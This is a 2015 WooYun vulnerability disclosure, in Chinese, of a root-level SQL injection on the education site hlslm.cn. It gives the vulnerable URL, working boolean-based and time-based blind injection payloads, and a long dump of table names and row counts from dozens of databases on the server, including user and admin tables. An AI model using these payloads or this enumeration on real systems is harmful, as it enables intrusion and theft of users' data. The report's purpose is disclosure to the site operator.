好老师联盟root权限SQL注入泄漏导致全站122库/近20W用户数据告急

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130588

漏洞标题：好老师联盟root权限SQL注入泄漏导致全站122库/近20W用户数据告急

漏洞作者：路人甲

提交时间：2015-08-20 09:07

修复时间：2015-10-04 09:12

公开时间：2015-10-04 09:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-20：细节已通知厂商并且等待厂商处理中
2015-08-20：厂商已经确认，细节仅向厂商公开
2015-08-30：细节向核心白帽子及相关领域专家公开
2015-09-09：细节向普通白帽子公开
2015-09-19：细节向实习白帽子公开
2015-10-04：细节向公众公开

简要描述：

详细说明：

漏洞地址：

http://www.hlslm.cn/Content/id/88*

---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.hlslm.cn:80/Content/id/88) AND 2197=2197 AND (9697=9697
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.hlslm.cn:80/Content/id/88) AND (SELECT * FROM (SELECT(SLEEP(5)))eLJq) AND (4314=4314
---

漏洞证明：

跑了半个月终于把122个数据库表项跑出来了。

Database: ppc
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| pre_forum_post                        | 135404  |
| pre_common_credit_log_field           | 111673  |
| pre_common_credit_log                 | 111393  |
| pre_home_notification                 | 104787  |
| pre_common_remote_port                | 103677  |
| pre_forum_threadpartake               | 63168   |
| pre_forum_filter_post                 | 62305   |
| pre_common_district                   | 45051   |
| pre_forum_attachment                  | 37372   |
| pre_common_tagitem                    | 36349   |
| pre_common_credit_rule_log            | 31830   |
| pre_forum_thread                      | 31692   |
| pre_forum_statlog                     | 25988   |
| pre_wechat_log                        | 18983   |
| pre_common_member                     | 17759   |
| pre_common_member_profile             | 17679   |
| pre_ucenter_members                   | 17647   |
| pre_ucenter_memberfields              | 17643   |
| pre_common_member_count               | 17619   |
| pre_common_member_field_forum         | 17619   |
| pre_common_member_field_home          | 17619   |
| pre_common_member_status              | 17619   |
| pre_common_member_grouppm             | 17585   |
| pre_home_follow_feed_archiver         | 16142   |
| pre_forum_threadpreview               | 15839   |
| pre_common_member_newprompt           | 13411   |
| pre_home_doing                        | 13118   |
| pre_forum_threadmod                   | 11879   |
| pre_active_lottery_line_zh            | 10235   |
| pre_common_onlinetime                 | 9805    |
| pre_connect_memberbindlog             | 9553    |
| pre_common_member_connect             | 8769    |
| pre_teacher_tp_user_comments          | 8700    |
| pre_common_tag                        | 8536    |
| pre_mobile_wsq_threadlist             | 6670    |
| pre_forum_medallog                    | 6233    |
| pre_common_member_medal               | 5938    |
| pre_forum_threadimage                 | 5340    |
| pre_common_mytask                     | 5259    |
| pre_forum_sofa                        | 5104    |
| pre_forum_postcomment                 | 4728    |
| pre_teacher_tp_appointment            | 4538    |
| pre_forum_attachment_4                | 4249    |
| pre_dsu_paulsign                      | 4009    |
| pre_forum_attachment_9                | 3963    |
| pre_teacher_course_time               | 3927    |
| pre_forum_attachment_5                | 3791    |
| pre_forum_attachment_6                | 3777    |
| pre_forum_attachment_2                | 3724    |
| pre_weixin_teacher_log                | 3687    |
| pre_forum_attachment_0                | 3646    |
| pre_forum_attachment_3                | 3629    |
| pre_forum_modwork                     | 3585    |
| pre_forum_attachment_7                | 3557    |
| pre_teacher_china                     | 3555    |
| pre_forum_attachment_8                | 3455    |
| pre_common_block_pic                  | 3421    |
| pre_forum_attachment_1                | 3139    |
| pre_active_share_qq_log               | 2978    |
| sms_send                              | 2287    |
| pre_common_connect_guest              | 2228    |
| pre_mall_down_15                      | 1998    |
| pre_teacher_tp_type                   | 1837    |
| pre_forum_postcache                   | 1825    |
| pre_mall_order                        | 1707    |
| pre_home_pic                          | 1696    |
| pre_teacher_consumption               | 1677    |
| pre_home_friend_request               | 1634    |
| pre_weixin_log                        | 1570    |
| pre_common_verifycode                 | 1534    |
| pre_home_friend                       | 1388    |
| pre_teacher_tp_user_false_data        | 1386    |
| pre_forum_ratelog                     | 1306    |
| pre_home_favorite                     | 1011    |
| pre_common_member_crime               | 957     |
| pre_active_lottery_zh                 | 907     |
| pre_common_admincp_perm               | 879     |
| pre_teacher_need_status               | 839     |
| pre_mall_withdata                     | 829     |
| pre_common_plugin_luckypacketlog      | 739     |
| pre_forum_rsscache                    | 725     |
| pre_active_lottery_chance_zh          | 633     |
| pre_common_stat                       | 633     |
| pre_forum_post_tableid                | 583     |
| pre_forum_spacecache                  | 580     |
| pre_mall_down_data_15                 | 575     |
| pre_home_follow                       | 565     |
| pre_common_block_item                 | 559     |
| pre_common_credit_rule_log_field      | 556     |
| pre_plugin_formmanage_formlist        | 534     |
| pre_forum_attachment_unused           | 532     |
| pre_forum_pollvoter                   | 532     |
| pre_ucenter_notelist                  | 496     |
| pre_common_setting                    | 475     |
| pre_home_blog                         | 464     |
| pre_home_blogfield                    | 464     |
| pre_active_changeusername             | 455     |
| pre_forum_polloption                  | 439     |
| pre_moodwall                          | 426     |
| pre_forum_debatepost                  | 406     |
| pre_active_city_website_push_log      | 401     |
| pre_forum_memberrecommend             | 397     |
| pre_forum_threadclass                 | 388     |
| pre_teacher_detail                    | 359     |
| pre_myrepeats                         | 340     |
| pre_teacher_tp_index                  | 337     |
| pre_common_card                       | 336     |
| pre_teachers_teachers_extends         | 327     |
| pre_common_syscache                   | 326     |
| pre_home_pokearchive                  | 314     |
| pre_mall_address                      | 310     |
| pre_log                               | 288     |
| pre_forum_hotreply_member             | 279     |
| pre_home_share                        | 278     |
| pre_teacher_need                      | 270     |
| pre_forum_replycredit                 | 269     |
| pre_common_statuser                   | 268     |
| pre_home_docomment                    | 257     |
| pre_common_pluginvar                  | 256     |
| pre_forum_hotreply_number             | 256     |
| pre_home_comment                      | 256     |
| pre_forum_moderator                   | 254     |
| pre_home_clickuser                    | 248     |
| pre_common_grouppm                    | 247     |
| pre_teacher_wechat_send_log           | 227     |
| pre_home_follow_feed                  | 226     |
| pre_common_stylevar                   | 225     |
| pre_forum_newthread                   | 215     |
| pre_common_smiley                     | 207     |
| pre_teacher_orders                    | 177     |
| pre_teacher_course                    | 173     |
| pre_teacher_qrcode                    | 167     |
| pre_connect_postfeedlog               | 164     |
| pre_home_feed                         | 155     |
| pre_forum_poststick                   | 143     |
| pre_mall_fields                       | 139     |
| pre_teacher_course_type               | 138     |
| pre_home_visitor                      | 127     |
| pre_common_block_style                | 125     |
| pre_common_member_wechatmp            | 116     |
| pre_common_block                      | 114     |
| pre_connect_feedlog                   | 111     |
| pre_common_member_action_log          | 106     |
| pre_home_album                        | 98      |
| pre_home_poke                         | 95      |
| pre_plugin_admincp_per                | 95      |
| pre_mall_shopping                     | 93      |
| pre_forum_forumfield                  | 89      |
| pre_forum_forum                       | 88      |
| pre_ucenter_pm_members                | 86      |
| pre_forum_poll                        | 84      |
| pre_common_card_log                   | 83      |
| pre_access                            | 82      |
| pre_connect_tthreadlog                | 79      |
| pre_ucenter_pm_indexes                | 77      |
| pre_common_magiclog                   | 76      |
| pre_forum_order                       | 70      |
| pre_common_nav                        | 69      |
| pre_active_city_website_hooks         | 64      |
| pre_common_template_block             | 64      |
| pre_common_cache                      | 57      |
| pre_active_questionnaire_users        | 56      |
| pre_teacher_commission_log            | 56      |
| pre_home_class                        | 55      |
| pre_node                              | 54      |
| pre_common_member_profile_setting     | 51      |
| pre_mall_favorite                     | 50      |
| pre_forum_activityapply               | 49      |
| pre_teacher_tp_article                | 48      |
| pre_forum_threadlog                   | 43      |
| pre_ucenter_pm_lists                  | 43      |
| pre_common_searchindex                | 41      |
| pre_common_admincp_member             | 37      |
| pre_common_plugin                     | 37      |
| pre_teacher_auditionlog               | 34      |
| pre_teacher_main                      | 33      |
| pre_baidusubmit_sitemap               | 32      |
| pre_common_usergroup                  | 32      |
| pre_common_usergroup_field            | 32      |
| pre_common_credit_rule                | 31      |
| pre_common_member_wechat              | 31      |
| pre_weixin_binding                    | 30      |
| pre_forum_debate                      | 29      |
| pre_article                           | 28      |
| pre_common_admincp_cmenu              | 27      |
| pre_forum_pinggu                      | 27      |
| pre_mall_list                         | 27      |
| pre_ucenter_settings                  | 27      |
| pre_teacher_wechat_audition_send_log  | 26      |
| pre_common_magic                      | 24      |
| pre_home_surrounding_user             | 23      |
| pre_common_advertisement              | 22      |
| pre_group_class_user                  | 21      |
| pre_common_cron                       | 20      |
| pre_common_myapp                      | 20      |
| pre_forum_faq                         | 20      |
| pre_active_active_zh                  | 19      |
| pre_common_admincp_group              | 17      |
| pre_teacher_auditiondata              | 16      |
| pre_home_click                        | 15      |
| pre_forum_onlinelist                  | 14      |
| pre_home_access                       | 14      |
| pre_teacher_proportion_rules          | 14      |
| pre_forum_medal                       | 13      |
| pre_common_optimizer                  | 12      |
| pre_home_show                         | 12      |
| pre_teacher_tp_area                   | 12      |
| pre_ucenter_pm_messages_5             | 12      |
| pre_common_member_magic               | 11      |
| pre_ucenter_newpm                     | 11      |
| pre_common_diy_data                   | 10      |
| pre_common_task                       | 10      |
| pre_forum_post_moderate               | 10      |
| pre_mall_advertsion                   | 10      |
| pre_role_user                         | 10      |
| pre_amy_user_setting                  | 9       |
| pre_appbyme_user_setting              | 9       |
| pre_baidusubmit_setting               | 9       |
| pre_common_admingroup                 | 9       |
| pre_dsu_paulsignemot                  | 9       |
| pre_forum_polloption_image            | 9       |
| pre_home_picfield                     | 9       |
| pre_teacher_qrcode_group              | 9       |
| pre_baidusubmit_urlstat               | 8       |
| pre_common_report                     | 8       |
| pre_ucenter_pm_messages_1             | 8       |
| pre_common_advertisement_custom       | 7       |
| pre_common_friendlink                 | 7       |
| pre_forum_forumrecommend              | 7       |
| pre_forum_threadclosed                | 7       |
| pre_forum_typeoption                  | 7       |
| pre_portal_topic                      | 7       |
| pre_ucenter_pm_messages_3             | 7       |
| pre_ucenter_pm_messages_6             | 7       |
| pre_common_block_favorite             | 6       |
| pre_common_taskvar                    | 6       |
| pre_forum_thread_moderate             | 6       |
| pre_group                             | 6       |
| pre_ucenter_pm_messages_2             | 6       |
| pre_ucenter_pm_messages_4             | 6       |
| pre_common_regip                      | 5       |
| pre_forum_bbcode                      | 5       |
| pre_forum_threadhot                   | 5       |
| pre_ucenter_admins                    | 5       |
| pre_ucenter_pm_messages_0             | 5       |
| pre_ucenter_pm_messages_9             | 5       |
| pre_common_banned                     | 4       |
| pre_common_member_verify              | 4       |
| pre_common_word                       | 4       |
| pre_forum_activity                    | 4       |
| pre_forum_imagetype                   | 4       |
| pre_mall_relation                     | 4       |
| pre_portal_rsscache                   | 4       |
| pre_role                              | 4       |
| pre_ucenter_pm_messages_7             | 4       |
| pre_ucenter_pm_messages_8             | 4       |
| pre_weixin_parm                       | 4       |
| pre_common_style                      | 3       |
| pre_forum_collection                  | 3       |
| pre_forum_collectionrelated           | 3       |
| pre_forum_collectionthread            | 3       |
| pre_forum_grouplevel                  | 3       |
| pre_group_class                       | 3       |
| pre_mall_advertsionswf                | 3       |
| pre_teacher_tp_user_false_parm        | 3       |
| pre_ucenter_applications              | 3       |
| pre_active_city_website_setting       | 2       |
| pre_appbyme_portal_module_source      | 2       |
| pre_common_block_item_data            | 2       |
| pre_common_template                   | 2       |
| pre_common_word_type                  | 2       |
| pre_forum_threadcalendar              | 2       |
| pre_forum_warning                     | 2       |
| pre_mobile_setting                    | 2       |
| pre_mobile_wechat_resource            | 2       |
| pre_security_failedlog                | 2       |
| pre_user                              | 2       |
| pre_active_questionnaire              | 1       |
| pre_appbyme_portal_module             | 1       |
| pre_common_admincp_session            | 1       |
| pre_common_failedlogin                | 1       |
| pre_common_plugin_aliyunrec           | 1       |
| pre_common_plugin_luckypacket         | 1       |
| pre_common_secquestion                | 1       |
| pre_common_template_permission        | 1       |
| pre_dsu_paulsignset                   | 1       |
| pre_forum_postlog                     | 1       |
| pre_forum_threadprofile               | 1       |
| pre_home_blog_moderate                | 1       |
| pre_home_doing_moderate               | 1       |
| pre_teacher_propotion_isopen          | 1       |
| pre_teacher_tp_user_feedback          | 1       |
| pre_ucenter_failedlogins              | 1       |
+---------------------------------------+---------+
Database: wwwchuguoyiminnet_qw
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| yzm_douuser                           | 2170    |
| yzm_log                               | 197     |
| yzm_citytele                          | 107     |
| yzm_pointcard                         | 60      |
| yzm_case                              | 54      |
| bg_user                               | 38      |
| yzm_users                             | 24      |
| yzm_host                              | 22      |
| yzm_chargelog                         | 20      |
| yzm_newplaycard                       | 20      |
| yzm_tong                              | 16      |
| yzm_consultant                        | 15      |
| yzm_grant                             | 8       |
| yzm_charge                            | 7       |
| yzm_casecate                          | 6       |
| yzm_product                           | 6       |
| yzm_emailsend                         | 5       |
| yzm_telephone                         | 5       |
| yzm_adminuser                         | 4       |
| yzm_choice                            | 4       |
| yzm_grantyb                           | 4       |
| yzm_picture                           | 4       |
| yzm_school                            | 4       |
| yzm_teacher                           | 4       |
| yzm_updatepwdlog                      | 4       |
| yzm_department                        | 3       |
| yzm_productlog                        | 3       |
| yzm_updateuserlog                     | 3       |
| yzm_info                              | 2       |
| yzm_statistician                      | 2       |
| yzm_affiche                           | 1       |
| yzm_alleyway                          | 1       |
| yzm_cardchecklog                      | 1       |
| yzm_productstatuslog                  | 1       |
| yzm_spread                            | 1       |
| yzm_spreaduser                        | 1       |
| yzm_videouser                         | 1       |
+---------------------------------------+---------+
Database: bfdly.com
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| v9_linkage                            | 3284    |
| v9_menu                               | 343     |
| v9_template_bak                       | 256     |
| v9_hits                               | 145     |
| v9_search                             | 145     |
| v9_news                               | 123     |
| v9_news_data                          | 123     |
| v9_model_field                        | 78      |
| v9_attachment                         | 76      |
| v9_attachment_index                   | 75      |
| v9_category                           | 69      |
| v9_cache                              | 27      |
| v9_module                             | 27      |
| v9_picture                            | 22      |
| v9_picture_data                       | 22      |
| v9_poster                             | 10      |
| v9_poster_space                       | 10      |
| v9_position                           | 8       |
| v9_urlrule                            | 8       |
| v9_member_group                       | 7       |
| v9_admin_role                         | 6       |
| v9_position_data                      | 5       |
| v9_sso_settings                       | 5       |
| v9_model                              | 4       |
| v9_type                               | 4       |
| v9_workflow                           | 4       |
| v9_member_menu                        | 3       |
| v9_admin                              | 2       |
| v9_admin_panel                        | 2       |
| v9_link                               | 2       |
| v9_comment_setting                    | 1       |
| v9_comment_table                      | 1       |
| v9_page                               | 1       |
| v9_site                               | 1       |
| v9_sso_admin                          | 1       |
| v9_sso_applications                   | 1       |
| v9_wap                                | 1       |
+---------------------------------------+---------+
Database: my97today
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| dede_sys_enum                         | 3347    |
| dede_area                             | 482     |
| dede_erradd                           | 389     |
| dede_addonarticle                     | 247     |
| dede_archives                         | 247     |
| dede_arctiny                          | 247     |
| dede_taglist                          | 239     |
| dede_tagindex                         | 166     |
| dede_sysconfig                        | 155     |
| dede_uploads                          | 60      |
| dede_myad                             | 20      |
| dede_stepselect                       | 15      |
| dede_arctype                          | 12      |
| dede_scores                           | 12      |
| dede_arcatt                           | 8       |
| dede_arcrank                          | 8       |
| dede_flinktype                        | 8       |
| dede_plus                             | 7       |
| dede_channeltype                      | 6       |
| dede_sys_module                       | 6       |
| dede_payment                          | 4       |
| dede_search_keywords                  | 4       |
| dede_shops_delivery                   | 4       |
| dede_admintype                        | 3       |
| dede_co_onepage                       | 3       |
| dede_moneycard_type                   | 3       |
| dede_downloads                        | 2       |
| dede_freelist                         | 2       |
| dede_guestbook                        | 2       |
| dede_homepageset                      | 2       |
| dede_member_model                     | 2       |
| dede_member_stowtype                  | 2       |
| dede_sys_set                          | 2       |
| dede_addon17                          | 1       |
| dede_admin                            | 1       |
| dede_diyform1                         | 1       |
| dede_flink                            | 1       |
| dede_member                           | 1       |
| dede_member_group                     | 1       |
| dede_member_person                    | 1       |
| dede_member_space                     | 1       |
| dede_member_tj                        | 1       |
| dede_member_type                      | 1       |
| dede_multiserv_config                 | 1       |
| dede_mytag                            | 1       |
| dede_softconfig                       | 1       |
| dede_vote                             | 1       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 993     |
| help_topic                            | 506     |
| help_keyword                          | 452     |
| help_category                         | 38      |
| db                                    | 35      |
| `user`                                | 6       |
| proc                                  | 4       |
| host                                  | 1       |
| plugin                                | 1       |
+---------------------------------------+---------+
Database: huatong.cliuxue.net
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| v9_linkage                            | 3284    |
| v9_menu                               | 343     |
| v9_template_bak                       | 177     |
| v9_attachment_index                   | 176     |
| v9_hits                               | 176     |
| v9_attachment                         | 138     |
| v9_news                               | 131     |
| v9_news_data                          | 131     |
| v9_category                           | 85      |
| v9_model_field                        | 78      |
| v9_search                             | 67      |
| v9_picture                            | 45      |
| v9_picture_data                       | 45      |
| v9_module                             | 27      |
| v9_cache                              | 26      |
| v9_poster                             | 10      |
| v9_poster_space                       | 10      |
| v9_position                           | 8       |
| v9_urlrule                            | 8       |
| v9_member_group                       | 7       |
| v9_position_data                      | 7       |
| v9_admin_role                         | 6       |
| v9_sso_settings                       | 5       |
| v9_model                              | 4       |
| v9_type                               | 4       |
| v9_workflow                           | 4       |
| v9_member_menu                        | 3       |
| v9_admin                              | 2       |
| v9_link                               | 2       |
| v9_comment_setting                    | 1       |
| v9_comment_table                      | 1       |
| v9_page                               | 1       |
| v9_site                               | 1       |
| v9_sso_admin                          | 1       |
| v9_sso_applications                   | 1       |
| v9_wap                                | 1       |
+---------------------------------------+---------+
Database: zt00p1_db
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| piwik_log_link_visit_action           | 2131706 |
| piwik_log_visit                       | 834961  |
| piwik_log_action                      | 193269  |
| piwik_archive_blob_2014_05            | 58558   |
| piwik_archive_blob_2013_08            | 47724   |
| piwik_archive_blob_2013_05            | 40429   |
| piwik_archive_blob_2013_07            | 39800   |
| piwik_archive_blob_2014_06            | 35274   |
| piwik_archive_blob_2013_01            | 33808   |
| piwik_archive_blob_2014_09            | 33304   |
| piwik_archive_blob_2014_08            | 33018   |
| piwik_archive_blob_2013_06            | 32693   |
| piwik_archive_blob_2013_03            | 30147   |
| piwik_archive_blob_2013_04            | 28743   |
| piwik_archive_blob_2014_04            | 27385   |
| piwik_archive_blob_2013_09            | 25312   |
| piwik_archive_blob_2013_10            | 24267   |
| piwik_archive_blob_2014_07            | 22930   |
| piwik_archive_numeric_2014_05         | 22527   |
| piwik_archive_blob_2014_10            | 21284   |
| piwik_archive_blob_2012_12            | 20424   |
| piwik_archive_blob_2014_03            | 17691   |
| piwik_archive_blob_2013_02            | 16851   |
| piwik_archive_numeric_2014_09         | 16672   |
| piwik_archive_blob_2013_11            | 15337   |
| piwik_archive_numeric_2013_08         | 14132   |
| piwik_archive_numeric_2014_08         | 14056   |
| piwik_archive_blob_2013_12            | 12927   |
| piwik_archive_numeric_2014_10         | 12192   |
| piwik_archive_blob_2014_02            | 10495   |
| piwik_archive_numeric_2014_06         | 10379   |
| piwik_archive_numeric_2013_10         | 10298   |
| piwik_archive_blob_2014_01            | 9727    |
| piwik_archive_numeric_2014_04         | 9717    |
| piwik_archive_numeric_2013_07         | 9602    |
| piwik_archive_numeric_2013_05         | 9280    |
| piwik_archive_numeric_2013_09         | 9206    |
| piwik_archive_blob_2014_12            | 8542    |
| piwik_archive_numeric_2014_07         | 8305    |
| piwik_archive_blob_2015_02            | 8102    |
| piwik_archive_numeric_2013_06         | 7662    |
| piwik_archive_blob_2014_11            | 7458    |
| piwik_archive_numeric_2014_03         | 6845    |
| piwik_archive_numeric_2013_04         | 6418    |
| piwik_archive_numeric_2013_01         | 6394    |
| piwik_archive_numeric_2013_03         | 6261    |
| piwik_archive_numeric_2013_11         | 5259    |
| piwik_archive_blob_2015_03            | 4667    |
| piwik_archive_blob_2015_01            | 4582    |
| piwik_archive_numeric_2013_12         | 4539    |
| piwik_archive_numeric_2012_12         | 4172    |
| piwik_archive_numeric_2014_01         | 4081    |
| piwik_archive_numeric_2014_02         | 3807    |
| piwik_archive_numeric_2014_12         | 3756    |
| piwik_archive_numeric_2013_02         | 3593    |
| piwik_archive_numeric_2015_02         | 3288    |
| piwik_archive_numeric_2014_11         | 3226    |
| piwik_archive_numeric_2015_03         | 2490    |
| piwik_archive_numeric_2015_01         | 2323    |
| piwik_archive_blob_2015_06            | 879     |
| piwik_archive_blob_2015_05            | 585     |
| piwik_archive_numeric_2015_06         | 531     |
| piwik_archive_blob_2015_04            | 357     |
| piwik_archive_numeric_2015_05         | 356     |
| bf_site_user                          | 252     |
| piwik_site                            | 229     |
| piwik_access                          | 219     |
| piwik_archive_numeric_2015_04         | 211     |
| bf_publish_history                    | 192     |
| piwik_option                          | 105     |
| piwik_archive_blob_2015_07            | 67      |
| piwik_archive_numeric_2015_07         | 42      |
| bf_article                            | 36      |
| bf_publish_status                     | 21      |
| piwik_segment                         | 18      |
| bf_sites                              | 7       |
| bf_users                              | 7       |
| bf_user_group                         | 6       |
| bf_user_info                          | 5       |
| piwik_user                            | 4       |
| piwik_user_dashboard                  | 3       |
| piwik_goal                            | 2       |
+---------------------------------------+---------+
Database: myxmxueda
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| dede_sys_enum                         | 3347    |
| dede_area                             | 482     |
| dede_addonarticle                     | 199     |
| dede_archives                         | 199     |
| dede_arctiny                          | 199     |
| dede_erradd                           | 189     |
| dede_sysconfig                        | 155     |
| dede_myad                             | 20      |
| dede_stepselect                       | 15      |
| dede_scores                           | 12      |
| dede_arcatt                           | 8       |
| dede_arcrank                          | 8       |
| dede_flinktype                        | 8       |
| dede_arctype                          | 7       |
| dede_plus                             | 7       |
| dede_channeltype                      | 6       |
| dede_flink                            | 6       |
| dede_sys_module                       | 6       |
| dede_payment                          | 4       |
| dede_shops_delivery                   | 4       |
| dede_admintype                        | 3       |
| dede_co_onepage                       | 3       |
| dede_homepageset                      | 3       |
| dede_moneycard_type                   | 3       |
| dede_freelist                         | 2       |
| dede_member_model                     | 2       |
| dede_member_stowtype                  | 2       |
| dede_search_keywords                  | 2       |
| dede_sys_set                          | 2       |
| dede_admin                            | 1       |
| dede_arcmulti                         | 1       |
| dede_member                           | 1       |
| dede_member_group                     | 1       |
| dede_member_person                    | 1       |
| dede_member_space                     | 1       |
| dede_member_tj                        | 1       |
| dede_member_type                      | 1       |
| dede_mytag                            | 1       |
| dede_softconfig                       | 1       |
| dede_uploads                          | 1       |
| dede_vote                             | 1       |
+---------------------------------------+---------+
Database: myxyxueda
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| dede_sys_enum                         | 3347    |
| dede_area                             | 482     |
| dede_addonarticle                     | 203     |
| dede_archives                         | 203     |
| dede_arctiny                          | 203     |
| dede_sysconfig                        | 153     |
| dede_erradd                           | 53      |
| dede_myad                             | 20      |
| dede_arcmulti                         | 18      |
| dede_stepselect                       | 15      |
| dede_scores                           | 12      |
| dede_uploads                          | 10      |
| dede_arcatt                           | 8       |
| dede_arcrank                          | 8       |
| dede_flinktype                        | 8       |
| dede_plus                             | 7       |
| dede_arctype                          | 6       |
| dede_channeltype                      | 6       |
| dede_sys_module                       | 6       |
| dede_payment                          | 4       |
| dede_shops_delivery                   | 4       |
| dede_admintype                        | 3       |
| dede_co_onepage                       | 3       |
| dede_moneycard_type                   | 3       |
| dede_search_keywords                  | 3       |
| dede_flink                            | 2       |
| dede_freelist                         | 2       |
| dede_homepageset                      | 2       |
| dede_member_model                     | 2       |
| dede_member_stowtype                  | 2       |
| dede_sys_set                          | 2       |
| dede_admin                            | 1       |
| dede_member                           | 1       |
| dede_member_group                     | 1       |
| dede_member_person                    | 1       |
| dede_member_space                     | 1       |
| dede_member_tj                        | 1       |
| dede_member_type                      | 1       |
| dede_mytag                            | 1       |
| dede_softconfig                       | 1       |
| dede_vote                             | 1       |
+---------------------------------------+---------+
Database: jztjy.cn
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| v9_linkage                            | 3284    |
| v9_log                                | 507     |
| v9_menu                               | 324     |
| v9_model_field                        | 130     |
| v9_cache                              | 30      |
| v9_module                             | 27      |
| v9_category                           | 23      |
| v9_poster                             | 10      |
| v9_poster_space                       | 10      |
| v9_position                           | 9       |
| v9_search                             | 9       |
| v9_type                               | 9       |
| v9_urlrule                            | 8       |
| v9_hits                               | 7       |
| v9_member_group                       | 7       |
| v9_admin_role                         | 6       |
| v9_keyword_data                       | 6       |
| v9_model                              | 6       |
| v9_news                               | 6       |
| v9_news_data                          | 6       |
| v9_keyword                            | 5       |
| v9_position_data                      | 5       |
| v9_sso_settings                       | 5       |
| v9_workflow                           | 4       |
| v9_member_menu                        | 3       |
| v9_attachment                         | 2       |
| v9_link                               | 2       |
| v9_page                               | 2       |
| v9_admin                              | 1       |
| v9_comment_setting                    | 1       |
| v9_site                               | 1       |
| v9_sso_admin                          | 1       |
| v9_sso_applications                   | 1       |
| v9_teacher                            | 1       |
| v9_teacher_data                       | 1       |
| v9_wap                                | 1       |
+---------------------------------------+---------+
Database: www_51fudao_org_xxq
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| zhuanti                               | 23      |
+---------------------------------------+---------+
Database: moban_huatong
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| dede_sys_enum                         | 3347    |
| dede_area                             | 482     |
| dede_sysconfig                        | 155     |
| dede_arctype                          | 50      |
| dede_myad                             | 20      |
| dede_stepselect                       | 15      |
| dede_scores                           | 12      |
| dede_uploads                          | 11      |
| dede_arctiny                          | 9       |
| dede_plus_changyan_setting            | 9       |
| dede_addonarticle                     | 8       |
| dede_arcatt                           | 8       |
| dede_archives                         | 8       |
| dede_arcrank                          | 8       |
| dede_flinktype                        | 8       |
| dede_sys_module                       | 7       |
| dede_channeltype                      | 6       |
| dede_plus                             | 6       |
| dede_payment                          | 4       |
| dede_shops_delivery                   | 4       |
| dede_admintype                        | 3       |
| dede_co_onepage                       | 3       |
| dede_flink                            | 3       |
| dede_moneycard_type                   | 3       |
| dede_freelist                         | 2       |
| dede_member_model                     | 2       |
| dede_member_stowtype                  | 2       |
| dede_sys_set                          | 2       |
| dede_admin                            | 1       |
| dede_arcmulti                         | 1       |
| dede_homepageset                      | 1       |
| dede_member                           | 1       |
| dede_member_group                     | 1       |
| dede_member_person                    | 1       |
| dede_member_space                     | 1       |
| dede_member_tj                        | 1       |
| dede_member_type                      | 1       |
| dede_softconfig                       | 1       |
| dede_vote                             | 1       |
+---------------------------------------+---------+
Database: wwwpcfmcn_qiaowai
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| yzm_douuser                           | 2170    |
| yzm_log                               | 197     |
| yzm_citytele                          | 107     |
| yzm_pointcard                         | 60      |
| yzm_case                              | 54      |
| bg_user                               | 38      |
| yzm_users                             | 24      |
| yzm_host                              | 22      |
| yzm_chargelog                         | 20      |
| yzm_newplaycard                       | 20      |
| yzm_tong                              | 16      |
| yzm_consultant                        | 15      |
| yzm_grant                             | 8       |
| yzm_charge                            | 7       |
| yzm_casecate                          | 6       |
| yzm_product                           | 6       |
| yzm_emailsend                         | 5       |
| yzm_telephone                         | 5       |
| yzm_adminuser                         | 4       |
| yzm_choice                            | 4       |
| yzm_grantyb                           | 4       |
| yzm_picture                           | 4       |
| yzm_school                            | 4       |
| yzm_teacher                           | 4       |
| yzm_updatepwdlog                      | 4       |
| yzm_department                        | 3       |
| yzm_productlog                        | 3       |
| yzm_updateuserlog                     | 3       |
| yzm_info                              | 2       |
| yzm_statistician                      | 2       |
| yzm_affiche                           | 1       |
| yzm_alleyway                          | 1       |
| yzm_cardchecklog                      | 1       |
| yzm_productstatuslog                  | 1       |
| yzm_spread                            | 1       |
| yzm_spreaduser                        | 1       |
| yzm_videouser                         | 1       |
+---------------------------------------+---------+
Database: sq_sinobm
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| sino_sys_enum                         | 3347    |
| sino_area                             | 482     |
| sino_archives                         | 199     |
| sino_arctiny                          | 199     |
| sino_sysconfig                        | 155     |
| sino_addoncourse                      | 116     |
| sino_uploads                          | 100     |
| sino_erradd                           | 66      |
| sino_arccache                         | 60      |
| sino_arctype                          | 47      |
| sino_addonarticle                     | 45      |
| sino_myad                             | 20      |
| sino_stepselect                       | 15      |
| sino_addonstudent                     | 12      |
| sino_scores                           | 12      |
| sino_addonspec                        | 10      |
| sino_search_keywords                  | 10      |
| sino_addonteam                        | 9       |
| sino_arcatt                           | 8       |
| sino_arcrank                          | 8       |
| sino_channeltype                      | 8       |
| sino_flinktype                        | 8       |
| sino_addonflash                       | 7       |
| sino_plus                             | 6       |
| sino_sys_module                       | 6       |
| sino_payment                          | 4       |
| sino_shops_delivery                   | 4       |
| sino_admintype                        | 3       |
| sino_arcmulti                         | 3       |
| sino_co_onepage                       | 3       |
| sino_moneycard_type                   | 3       |
| sino_admin                            | 2       |
| sino_downloads                        | 2       |
| sino_freelist                         | 2       |
| sino_homepageset                      | 2       |
| sino_keywords                         | 2       |
| sino_member                           | 2       |
| sino_member_model                     | 2       |
| sino_member_person                    | 2       |
| sino_member_space                     | 2       |
| sino_member_stowtype                  | 2       |
